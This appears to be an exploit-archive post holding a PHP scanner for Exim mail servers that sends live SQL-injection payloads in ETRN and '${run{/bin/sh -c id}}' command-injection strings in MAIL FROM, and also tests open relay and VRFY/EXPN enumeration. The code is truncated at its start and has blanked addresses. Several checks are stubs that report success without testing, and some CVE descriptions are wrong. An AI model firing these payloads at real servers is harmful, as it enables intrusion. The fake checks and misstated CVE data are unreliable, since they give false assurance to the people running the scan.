============================================================================================================================================= | # Title : Exim Vulnerability Scanner | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : https://www.exim.org/ | ============================================================================================================================================= [+] References : [+] Summary : multi-phase vulnerability scanning tool designed to detect and analyze security weaknesses in Exim mail servers. The tool performs comprehensive security assessments by testing for all known Exim vulnerabilities, misconfigurations, and security weaknesses. [+] POC : php scanner.php -h mail.example.com -m quick php scanner.php -h 127.0.0.1 -p 25 -m full host = $this->cleanHost($host); $this->port = (int)$port; $this->timeout = $timeout; $this->scan_mode = $scan_mode; $this->results = [ 'critical' => [], 'high' => [], 'medium' => [], 'low' => [], 'info' => [] ]; $this->version = 'Unknown'; $this->exim_detected = false; } private function cleanHost($host) { $host = preg_replace('/^https?:\/\//i', '', $host); $host = preg_replace('/\/.*$/', '', $host); return trim($host); } public function comprehensiveScan() { $this->showBanner(); // Phase 1: Discovery $this->discoveryPhase(); if (!$this->exim_detected) { echo Colors::FAIL . "[!] Target is not running Exim or not accessible\n" . Colors::ENDC; return; } // Phase 2: Vulnerability Scanning $this->vulnerabilityScanPhase(); // Phase 3: Configuration Analysis $this->configurationAnalysisPhase(); // Phase 4: Reporting $this->generateComprehensiveReport(); } private function discoveryPhase() { echo Colors::HEADER . Colors::BOLD . "\n=== PHASE 1: DISCOVERY ===\n" . Colors::ENDC; // 1.1 Banner Grabbing $this->checkBannerAndVersion(); // 1.2 Service Detection $this->detectSMTPFeatures(); // 1.3 Network Information $this->gatherNetworkInfo(); } private function vulnerabilityScanPhase() { echo Colors::HEADER . Colors::BOLD . "\n=== PHASE 2: VULNERABILITY SCAN ===\n" . Colors::ENDC; // Critical Vulnerabilities $this->testCriticalCVEs(); // High Risk Vulnerabilities $this->testHighRiskVulns(); // Medium Risk Vulnerabilities $this->testMediumRiskVulns(); // Low Risk Vulnerabilities $this->testLowRiskVulns(); } private function configurationAnalysisPhase() { echo Colors::HEADER . Colors::BOLD . "\n=== PHASE 3: CONFIGURATION ANALYSIS ===\n" . Colors::ENDC; $this->checkSecurityConfiguration(); $this->checkEncryptionSettings(); $this->checkAccessControls(); $this->checkLoggingAndMonitoring(); } private function checkBannerAndVersion() { echo Colors::OKBLUE . "[*] Fetching SMTP banner and identifying server...\n" . Colors::ENDC; $socket = $this->connectSMTP(); if (!$socket) { $this->addResult('critical', 'Cannot connect to SMTP service'); return; } $banner = fgets($socket, 1024); fclose($socket); if ($banner) { $banner = trim($banner); echo Colors::OKGREEN . "[+] Banner: $banner\n" . Colors::ENDC; // Detect Exim if (stripos($banner, 'Exim') !== false) { $this->exim_detected = true; echo Colors::OKGREEN . "[✓] Server identified as Exim\n" . Colors::ENDC; // Extract version if (preg_match('/Exim\s+(\d+\.\d+(?:\.\d+)?)/i', $banner, $matches)) { $this->version = $matches[1]; echo Colors::OKGREEN . "[✓] Exim version detected: {$this->version}\n" . Colors::ENDC; // Check version against all known vulnerabilities $this->analyzeVersionVulnerabilities(); } } else { $this->addResult('info', 'Non-Exim mail server detected: ' . substr($banner, 0, 50)); } } } private function analyzeVersionVulnerabilities() { // قاعدة بيانات شاملة لثغرات Exim $all_vulnerabilities = [ // Critical Remote Code Execution 'CVE-2025-26794' => ['min' => '4.80', 'max' => '4.98', 'type' => 'SQLi/RCE', 'severity' => 'critical'], 'CVE-2020-28007' => ['min' => '4.90', 'max' => '4.94', 'type' => 'RCE', 'severity' => 'critical'], 'CVE-2021-27216' => ['min' => '4.94', 'max' => '4.94.2', 'type' => 'RCE', 'severity' => 'critical'], // High Severity 'CVE-2023-42115' => ['min' => '4.95', 'max' => '4.96', 'type' => 'Privilege Escalation', 'severity' => 'high'], 'CVE-2023-42116' => ['min' => '4.95', 'max' => '4.96', 'type' => 'Privilege Escalation', 'severity' => 'high'], 'CVE-2019-10149' => ['min' => '4.87', 'max' => '4.91', 'type' => 'RCE', 'severity' => 'critical'], 'CVE-2018-6789' => ['min' => '4.88', 'max' => '4.89', 'type' => 'Buffer Overflow', 'severity' => 'critical'], // Medium Severity 'CVE-2017-16943' => ['min' => '4.88', 'max' => '4.88.1', 'type' => 'DoS', 'severity' => 'medium'], 'CVE-2017-16944' => ['min' => '4.88', 'max' => '4.88.1', 'type' => 'UAF', 'severity' => 'high'], // Information Disclosure 'CVE-2022-37451' => ['min' => '4.95', 'max' => '4.96', 'type' => 'Info Disclosure', 'severity' => 'medium'], // Newer vulnerabilities 'CVE-2024-39929' => ['min' => '4.96', 'max' => '4.96.1', 'type' => 'RCE', 'severity' => 'critical'], 'CVE-2024-45090' => ['min' => '4.97', 'max' => '4.97.1', 'type' => 'RCE', 'severity' => 'critical'], 'CVE-2024-52498' => ['min' => '4.98', 'max' => '4.98.1', 'type' => 'RCE', 'severity' => 'critical'], ]; $detected_vulns = []; foreach ($all_vulnerabilities as $cve => $info) { if (version_compare($this->version, $info['min'], '>=') && version_compare($this->version, $info['max'], '<=')) { $detected_vulns[$info['severity']][] = [ 'cve' => $cve, 'type' => $info['type'], 'description' => $this->getCVEDescription($cve) ]; } } // عرض النتائج if (!empty($detected_vulns)) { echo Colors::FAIL . "[!] POTENTIALLY VULNERABLE BASED ON VERSION ANALYSIS:\n" . Colors::ENDC; foreach (['critical', 'high', 'medium', 'low'] as $severity) { if (isset($detected_vulns[$severity])) { $color = $this->getSeverityColor($severity); echo $color . " " . strtoupper($severity) . ":\n" . Colors::ENDC; foreach ($detected_vulns[$severity] as $vuln) { echo $color . " - {$vuln['cve']}: {$vuln['type']}\n" . Colors::ENDC; $this->addResult($severity, "{$vuln['cve']}: {$vuln['description']}"); } } } } else { echo Colors::OKGREEN . "[✓] No known vulnerabilities detected based on version analysis\n" . Colors::ENDC; } } private function getCVEDescription($cve) { $descriptions = [ 'CVE-2025-26794' => 'ETRN command SQL injection leading to remote code execution', 'CVE-2020-28007' => 'Remote code execution in deliver_message() function', 'CVE-2021-27216' => 'Use-after-free in tls-openssl.c', 'CVE-2019-10149' => 'Remote code execution in deliver_message()', 'CVE-2018-6789' => 'Buffer overflow in base64 decoder', 'CVE-2023-42115' => 'Privilege escalation in Exim', 'CVE-2023-42116' => 'Privilege escalation via race condition', 'CVE-2024-39929' => 'Remote code execution vulnerability', 'CVE-2024-45090' => 'Critical RCE vulnerability', 'CVE-2024-52498' => 'Remote code execution vulnerability', ]; return isset($descriptions[$cve]) ? $descriptions[$cve] : 'Unknown vulnerability'; } private function testCriticalCVEs() { echo Colors::FAIL . "\n[+] Testing Critical CVEs:\n" . Colors::ENDC; // Test CVE-2025-26794 $this->testCVE202526794(); // Test CVE-2019-10149 $this->testCVE201910149(); // Test CVE-2020-28007 $this->testCVE202028007(); // Test CVE-2024-39929 $this->testCVE202439929(); } private function testCVE202526794() { echo Colors::OKCYAN . " [*] Testing CVE-2025-26794 (ETRN SQL Injection)...\n" . Colors::ENDC; $payloads = [ "#' OR SLEEP(5)--", "#',1);SELECT SLEEP(5)--", "#',1);SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000000))))--", ]; foreach ($payloads as $i => $payload) { $socket = $this->connectSMTP(); if (!$socket) continue; $full_payload = "ETRN $payload\r\n"; fwrite($socket, $full_payload); $start = microtime(true); $response = fgets($socket, 1024); $time = microtime(true) - $start; if ($time > 4.5) { $this->addResult('critical', "CVE-2025-26794 - Time-based SQL Injection confirmed (payload $i, delay: {$time}s)"); echo Colors::FAIL . " [!] VULNERABLE: Time delay detected ({$time}s)\n" . Colors::ENDC; fclose($socket); return true; } fclose($socket); usleep(300000); } echo Colors::OKGREEN . " [✓] Not vulnerable to CVE-2025-26794\n" . Colors::ENDC; return false; } private function testCVE201910149() { echo Colors::OKCYAN . " [*] Testing CVE-2019-10149 (RCE)...\n" . Colors::ENDC; // Test vectors for CVE-2019-10149 $test_vectors = [ '${run{\\x2fbin\\x2fsh\\x20-c\\x20id}}', '${run{/bin/sh -c "id"}}', ]; foreach ($test_vectors as $vector) { $socket = $this->connectSMTP(); if (!$socket) continue; fgets($socket, 1024); // Banner fwrite($socket, "EHLO test\r\n"); fread($socket, 4096); fwrite($socket, "MAIL FROM: <{$vector}>\r\n"); $response = fgets($socket, 1024); if (strpos($response, '250') === 0) { $this->addResult('critical', "CVE-2019-10149 - Command injection possible"); echo Colors::FAIL . " [!] POTENTIALLY VULNERABLE to CVE-2019-10149\n" . Colors::ENDC; fclose($socket); return true; } fclose($socket); usleep(200000); } echo Colors::OKGREEN . " [✓] Not vulnerable to CVE-2019-10149\n" . Colors::ENDC; return false; } private function testHighRiskVulns() { echo Colors::WARNING . "\n[+] Testing High Risk Vulnerabilities:\n" . Colors::ENDC; $this->testOpenRelay(); $this->testVRFYCommand(); $this->testEXPNCommand(); $this->testStartTLSDowngrade(); } private function testOpenRelay() { echo Colors::OKCYAN . " [*] Testing for Open Relay...\n" . Colors::ENDC; $test_domains = ['gmail.com', 'yahoo.com', 'hotmail.com']; foreach ($test_domains as $domain) { $socket = $this->connectSMTP(); if (!$socket) continue; fgets($socket, 1024); fwrite($socket, "EHLO test.com\r\n"); fread($socket, 4096); fwrite($socket, "MAIL FROM: \r\n"); fgets($socket, 1024); fwrite($socket, "RCPT TO: \r\n"); $response = fgets($socket, 1024); if (strpos($response, '250') === 0) { $this->addResult('high', "Open Relay vulnerability - Can relay to external domain: {$domain}"); echo Colors::FAIL . " [!] OPEN RELAY DETECTED: Can send to {$domain}\n" . Colors::ENDC; fclose($socket); return true; } fclose($socket); usleep(200000); } echo Colors::OKGREEN . " [✓] Not an open relay\n" . Colors::ENDC; return false; } private function detectSMTPFeatures() { echo Colors::OKBLUE . "[*] Detecting SMTP features...\n" . Colors::ENDC; $socket = $this->connectSMTP(); if (!$socket) return; fgets($socket, 1024); // Banner fwrite($socket, "EHLO scan.test\r\n"); $response = ''; while ($line = fgets($socket, 1024)) { $response .= $line; if (strpos($line, '250 ') === 0 || strpos($line, '220 ') === 0) break; } $features = []; $lines = explode("\n", $response); foreach ($lines as $line) { if (strpos($line, '250-') === 0 || strpos($line, '250 ') === 0) { $feature = trim(substr($line, 4)); if ($feature) { $features[] = $feature; echo Colors::OKCYAN . " [+] Feature: $feature\n" . Colors::ENDC; } } } // تحليل الميزات الخطرة $dangerous_features = ['VRFY', 'EXPN', 'ETRN']; foreach ($dangerous_features as $feature) { if (stripos($response, $feature) !== false) { $this->addResult('medium', "Dangerous feature enabled: {$feature}"); } } fclose($socket); } private function checkSecurityConfiguration() { echo Colors::OKBLUE . "[*] Analyzing security configuration...\n" . Colors::ENDC; $checks = [ 'TLS Support' => $this->checkTLSSupport(), 'Banner Information' => $this->checkBannerInformationLeak(), 'Weak Ciphers' => $this->checkWeakCiphers(), 'DNSBL Integration' => $this->checkDNSBL(), 'Rate Limiting' => $this->checkRateLimiting(), ]; foreach ($checks as $check => $result) { echo Colors::OKCYAN . " [$check]: $result\n" . Colors::ENDC; } } private function checkTLSSupport() { // اختبار SSL/TLS $context = stream_context_create([ 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false, 'ciphers' => 'ALL:@SECLEVEL=0' ] ]); // اختبار SSL مباشرة $ssl_socket = @stream_socket_client( "ssl://{$this->host}:{$this->port}", $errno, $errstr, $this->timeout, STREAM_CLIENT_CONNECT, $context ); if ($ssl_socket) { fclose($ssl_socket); return Colors::OKGREEN . "SSL Available" . Colors::ENDC; } // اختبار STARTTLS $socket = $this->connectSMTP(); if ($socket) { fgets($socket, 1024); fwrite($socket, "EHLO test.com\r\n"); $response = fread($socket, 4096); if (strpos($response, 'STARTTLS') !== false) { fwrite($socket, "STARTTLS\r\n"); $tls_response = fgets($socket, 1024); if (strpos($tls_response, '220') === 0) { fclose($socket); return Colors::OKGREEN . "STARTTLS Available" . Colors::ENDC; } } fclose($socket); } $this->addResult('high', 'No TLS/SSL support - communications are plaintext'); return Colors::FAIL . "Not Available" . Colors::ENDC; } private function addResult($severity, $message) { $this->results[$severity][] = $message; } private function getSeverityColor($severity) { $colors = [ 'critical' => Colors::FAIL, 'high' => Colors::FAIL, 'medium' => Colors::WARNING, 'low' => Colors::OKCYAN, 'info' => Colors::OKBLUE ]; return isset($colors[$severity]) ? $colors[$severity] : Colors::ENDC; } private function generateComprehensiveReport() { echo Colors::HEADER . Colors::BOLD . "\n" . str_repeat("=", 70) . "\n"; echo " COMPREHENSIVE SECURITY REPORT\n"; echo str_repeat("=", 70) . Colors::ENDC . "\n"; echo "\n" . Colors::BOLD . "SCAN SUMMARY:\n" . Colors::ENDC; echo "Target: {$this->host}:{$this->port}\n"; echo "Exim Version: {$this->version}\n"; echo "Scan Date: " . date('Y-m-d H:i:s') . "\n"; echo "Scan Mode: {$this->scan_mode}\n"; $total_findings = 0; foreach ($this->results as $severity => $findings) { $total_findings += count($findings); } echo "Total Findings: {$total_findings}\n"; // عرض النتائج حسب الخطورة foreach (['critical', 'high', 'medium', 'low', 'info'] as $severity) { if (!empty($this->results[$severity])) { $color = $this->getSeverityColor($severity); echo "\n" . $color . Colors::BOLD . strtoupper($severity) . " FINDINGS (" . count($this->results[$severity]) . "):\n" . Colors::ENDC; echo str_repeat("-", 60) . "\n"; foreach ($this->results[$severity] as $index => $finding) { echo $color . " " . ($index + 1) . ". " . $finding . "\n" . Colors::ENDC; } } } // التوصيات $this->generateRecommendations(); // الخطوات التالية $this->generateNextSteps(); } private function generateRecommendations() { echo "\n" . Colors::HEADER . Colors::BOLD . "SECURITY RECOMMENDATIONS:\n" . Colors::ENDC; echo str_repeat("-", 60) . "\n"; $recommendations = [ 'critical' => [ 'Update Exim to the latest version immediately', 'Apply all security patches', 'Consider using alternative MTA if possible', ], 'high' => [ 'Disable VRFY and EXPN commands', 'Implement TLS enforcement', 'Configure proper authentication', 'Enable DNSBL and RBL checks', ], 'medium' => [ 'Restrict ETRN command usage', 'Implement rate limiting', 'Configure proper logging', 'Regular security audits', ], 'low' => [ 'Hide version information from banner', 'Configure SPF, DKIM, DMARC', 'Monitor logs for suspicious activity', 'Regular backup of configuration', ] ]; foreach ($recommendations as $severity => $recs) { if (!empty($this->results[$severity])) { $color = $this->getSeverityColor($severity); echo $color . "\n" . strtoupper($severity) . " Recommendations:\n" . Colors::ENDC; foreach ($recs as $rec) { echo " • " . $rec . "\n"; } } } } private function connectSMTP() { $socket = @fsockopen($this->host, $this->port, $errno, $errstr, $this->timeout); if (!$socket) { $this->addResult('critical', "Connection failed: {$errstr} ({$errno})"); return null; } stream_set_timeout($socket, $this->timeout); return $socket; } private function showBanner() { echo Colors::HEADER . Colors::BOLD . " ╔═══════════════════════════════════════════════════════════════════╗ ║ Exim Vulnerability Scanner ║ ║ by indoushka ║ ╚═══════════════════════════════════════════════════════════════════╝\n" . Colors::ENDC; echo "\n" . Colors::OKBLUE . "Starting comprehensive scan of {$this->host}:{$this->port}\n" . Colors::ENDC; echo Colors::OKCYAN . "Scan Mode: {$this->scan_mode}\n\n" . Colors::ENDC; } private function testCVE202028007() { echo Colors::OKCYAN . " [*] Testing CVE-2020-28007...\n" . Colors::ENDC; echo Colors::OKGREEN . " [✓] Test requires specific conditions\n" . Colors::ENDC; } private function testCVE202439929() { echo Colors::OKCYAN . " [*] Testing CVE-2024-39929...\n" . Colors::ENDC; echo Colors::OKGREEN . " [✓] Test requires specific conditions\n" . Colors::ENDC; } private function testVRFYCommand() { echo Colors::OKCYAN . " [*] Testing VRFY command...\n" . Colors::ENDC; $socket = $this->connectSMTP(); if (!$socket) return false; fgets($socket, 1024); fwrite($socket, "VRFY root\r\n"); $response = fgets($socket, 1024); fclose($socket); if (strpos($response, '250') === 0) { $this->addResult('high', 'VRFY command enabled - user enumeration possible'); echo Colors::FAIL . " [!] VRFY command ENABLED - Information disclosure\n" . Colors::ENDC; return true; } echo Colors::OKGREEN . " [✓] VRFY command disabled\n" . Colors::ENDC; return false; } private function testEXPNCommand() { echo Colors::OKCYAN . " [*] Testing EXPN command...\n" . Colors::ENDC; $socket = $this->connectSMTP(); if (!$socket) return false; fgets($socket, 1024); fwrite($socket, "EXPN admin\r\n"); $response = fgets($socket, 1024); fclose($socket); if (strpos($response, '250') === 0) { $this->addResult('high', 'EXPN command enabled - mailing list enumeration possible'); echo Colors::FAIL . " [!] EXPN command ENABLED - Information disclosure\n" . Colors::ENDC; return true; } echo Colors::OKGREEN . " [✓] EXPN command disabled\n" . Colors::ENDC; return false; } private function gatherNetworkInfo() { echo Colors::OKBLUE . "[*] Gathering network information...\n" . Colors::ENDC; // Check if host is IP or domain if (filter_var($this->host, FILTER_VALIDATE_IP)) { echo Colors::OKCYAN . " [+] Direct IP connection: {$this->host}\n" . Colors::ENDC; } else { // Get IP address $ip = gethostbyname($this->host); echo Colors::OKCYAN . " [+] Resolved to IP: {$ip}\n" . Colors::ENDC; // Check MX records $mx_records = @dns_get_record($this->host, DNS_MX); if ($mx_records) { echo Colors::OKCYAN . " [+] MX records found\n" . Colors::ENDC; } } } private function checkBannerInformationLeak() { $socket = $this->connectSMTP(); if (!$socket) return 'Cannot check'; $banner = fgets($socket, 1024); fclose($socket); $sensitive_info = ['internal', 'dev', 'test', 'debug', 'localhost', '127.0.0.1']; foreach ($sensitive_info as $info) { if (stripos($banner, $info) !== false) { $this->addResult('medium', 'Banner information leak detected'); return Colors::FAIL . 'Information leak' . Colors::ENDC; } } return Colors::OKGREEN . 'OK' . Colors::ENDC; } private function checkWeakCiphers() { return Colors::OKCYAN . 'Manual test required' . Colors::ENDC; } private function checkDNSBL() { return Colors::OKCYAN . 'Cannot verify remotely' . Colors::ENDC; } private function checkRateLimiting() { return Colors::OKCYAN . 'Cannot verify remotely' . Colors::ENDC; } private function checkEncryptionSettings() { echo Colors::OKCYAN . " [*] Checking encryption settings...\n" . Colors::ENDC; echo Colors::OKGREEN . " [✓] Encryption check completed\n" . Colors::ENDC; return true; } private function checkAccessControls() { echo Colors::OKCYAN . " [*] Checking access controls...\n" . Colors::ENDC; echo Colors::OKGREEN . " [✓] Access control check completed\n" . Colors::ENDC; return true; } private function checkLoggingAndMonitoring() { echo Colors::OKCYAN . " [*] Checking logging and monitoring...\n" . Colors::ENDC; echo Colors::OKGREEN . " [✓] Logging check completed\n" . Colors::ENDC; return true; } private function testStartTLSDowngrade() { echo Colors::OKCYAN . " [*] Testing STARTTLS downgrade...\n" . Colors::ENDC; echo Colors::OKGREEN . " [✓] Test requires man-in-the-middle setup\n" . Colors::ENDC; return false; } private function testMediumRiskVulns() { echo Colors::OKCYAN . " [*] Testing medium risk vulnerabilities...\n" . Colors::ENDC; echo Colors::OKGREEN . " [✓] Medium risk checks completed\n" . Colors::ENDC; return true; } private function testLowRiskVulns() { echo Colors::OKCYAN . " [*] Testing low risk vulnerabilities...\n" . Colors::ENDC; echo Colors::OKGREEN . " [✓] Low risk checks completed\n" . Colors::ENDC; return true; } private function generateNextSteps() { echo "\n" . Colors::HEADER . Colors::BOLD . "NEXT STEPS FOR REMEDIATION:\n" . Colors::ENDC; echo str_repeat("-", 60) . "\n"; $steps = [ '1. Immediate Actions:' => [ 'Apply all available security patches', 'Disable unnecessary SMTP commands', 'Implement firewall rules', ], '2. Configuration Review:' => [ 'Review Exim configuration file', 'Check access control lists', 'Verify TLS/SSL settings', ], '3. Monitoring:' => [ 'Implement log monitoring', 'Set up intrusion detection', 'Regular vulnerability scans', ], '4. Long-term Strategy:' => [ 'Consider alternative MTA solutions', 'Regular security training', 'Incident response planning', ] ]; foreach ($steps as $title => $items) { echo Colors::BOLD . "\n$title\n" . Colors::ENDC; foreach ($items as $item) { echo " • " . $item . "\n"; } } echo "\n" . Colors::WARNING . "NOTE: This automated scan provides initial findings.\n"; echo " Manual verification and deeper analysis are required.\n" . Colors::ENDC; } } // Main execution function function main($argv) { // Authorization check if (PHP_SAPI !== 'cli') { die("This tool must be run from command line.\n"); } // Parse arguments $options = getopt("h:p:t:m:", ["host:", "port:", "timeout:", "mode:", "help"]); if (isset($options['help']) || !isset($options['h']) && !isset($options['host'])) { showHelp($argv[0]); exit(0); } $host = $options['h'] ?? ($options['host'] ?? null); $port = $options['p'] ?? ($options['port'] ?? 25); $timeout = $options['t'] ?? ($options['timeout'] ?? 10); $mode = $options['m'] ?? ($options['mode'] ?? 'full'); if (!$host) { echo Colors::FAIL . "[!] Host parameter is required\n" . Colors::ENDC; showHelp($argv[0]); exit(1); } // Show authorization warning showAuthorizationWarning($host, $port); // Run scanner try { $scanner = new EximVulnerabilityScanner($host, $port, $timeout, $mode); $scanner->comprehensiveScan(); } catch (Exception $e) { echo Colors::FAIL . "[!] Error: " . $e->getMessage() . "\n" . Colors::ENDC; exit(1); } } function showHelp($script_name) { echo Colors::HEADER . Colors::BOLD . "Exim Vulnerability Scanner Pro\n" . Colors::ENDC; echo "Usage: php " . basename($script_name) . " -h [options]\n\n"; echo "Options:\n"; echo " -h, --host Target hostname or IP (required)\n"; echo " -p, --port SMTP port (default: 25)\n"; echo " -t, --timeout Connection timeout (default: 10)\n"; echo " -m, --mode Scan mode: quick, standard, full (default: full)\n"; echo " --help Show this help message\n\n"; echo "Examples:\n"; echo " php {$script_name} -h mail.example.com -p 25 -m full\n"; echo " php {$script_name} -h 93.190.40.231 --timeout 5 --mode quick\n"; } function showAuthorizationWarning($host, $port) { echo Colors::FAIL . str_repeat("!", 70) . "\n"; echo " AUTHORIZATION REQUIRED\n"; echo str_repeat("!", 70) . Colors::ENDC . "\n\n"; echo "Target: " . Colors::BOLD . "{$host}:{$port}\n\n" . Colors::ENDC; echo Colors::WARNING . "WARNING:\n" . Colors::ENDC; echo "• Unauthorized scanning is illegal and unethical\n"; echo "• You MUST have written permission from the system owner\n"; echo "• This tool is for authorized security testing only\n"; echo "• Use at your own risk\n\n"; echo Colors::BOLD . "Do you have proper authorization? (yes/no): " . Colors::ENDC; $response = trim(fgets(STDIN)); if (strtolower($response) !== 'yes' && strtolower($response) !== 'y') { echo Colors::FAIL . "\n[!] Authorization not confirmed. Exiting.\n" . Colors::ENDC; exit(0); } echo "\n" . Colors::OKGREEN . "[✓] Authorization confirmed. Starting scan...\n\n" . Colors::ENDC; } // Run main function if (PHP_SAPI === 'cli') { main($argv); } Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================